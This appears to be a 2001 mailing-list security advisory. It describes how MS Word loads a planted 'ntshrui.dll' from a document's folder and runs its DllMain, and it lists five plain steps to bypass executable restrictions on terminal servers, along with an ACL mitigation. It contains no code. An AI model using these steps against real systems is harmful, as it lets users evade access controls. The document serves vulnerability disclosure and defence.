MSword execution of dlls

[Anders Ingeborn <ingeborn () IXSECURITY COM>]

Hi,
while testing the riched20.dll-vulnerability (bid/1699) for a client we noticed
      that it is also
possible to make MS Word execute the DllMain()-function from the file
      "ntshrui.dll".

Impact: If users on a terminal server system are restricted from running
      executables in terms
of .exe-files but allowed to open Word documents, this feature can be used to
      run code.

Details: It can be exploited as:
(1) write a program with main function DllMain() and compile it as a .dll that
      you give the
name "ntshrui.dll"
(2) Put your .dll in the same directory as a word document.
(3) Close all Office applications
(4) Double-click on the word document
(5) When MS Word initializes it will use your ntshrui.dll instead of the one in
%systemroot% and your code will be executed

** I do not take credit for finding this vulnerability in Word, that goes to
      Georgi Guninski.
This is just an update regarding the name of the "malicious" .dll-file that one
      could use.
More info can be found on Georgi's website http://www.guninski.com **

Solution: We have discussed this with MS support (2001-01-29) and according to
      them this
should be handled/prevented by setting access control lists so that users are
      given read-only
rights and restricted from running applications in the directory where the
      document and .dll
are stored.

Regards,
Anders Ingeborn
iXsecurity, Stockholm 2001